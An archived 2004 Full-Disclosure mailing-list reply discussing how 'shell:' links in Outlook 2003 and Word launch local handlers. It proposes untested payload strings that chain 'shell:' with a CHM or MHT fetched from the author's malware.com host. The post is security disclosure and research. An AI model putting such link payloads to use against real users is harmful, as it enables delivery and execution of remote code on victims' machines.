[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] MSN Messenger is vulnerable to the shell: hole
- To: <full-disclosure@xxxxxxxxxxxxxxxx>
- Subject: Re: [Full-Disclosure] MSN Messenger is vulnerable to the shell: hole
- From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
- Date: Sun, 11 Jul 2004 16:17:29 -0000
<!--
Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft
Word 10.2627.3311 launches Notepad.
-->
this can be very interesting. The same in Outlook 2003 both html
and rich text. Good thing the named temp file deposits were
magically patched.
As Andreas Sandblad mentioned the other day the assigned
application will open depending on the file extension.
In Outlook 2003
shell:foo.hta will open an empty Html Application window
shell: foo.chm will run hh.exe with an error
shell: foo.js will run Windows Scripting Host with an error
showing the full path where it is looking to run foo.js
shell: foo.eml completely screws up Outlook Express with a
series of errors
the idea then would be to run directly through the non-existent
file it is trying to open e.g:
shell:foo.chm::http://www.malware.com//bad.chm::/foo.html
or
shell:C:foo.mht!http://www.malware.com//bad.chm::/foo.html
either that, or get something into shell:foo.hta or try to
resurrect the named file in the temp. Lot of possibilities
including embeddeding the file directly into the mail message
and linking to it.
All needs to be thoroughly examined though. Which would be
unfortunate for the peculiar completely clueless few who think
that you just "flick" a switch and the fireworks begin.
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html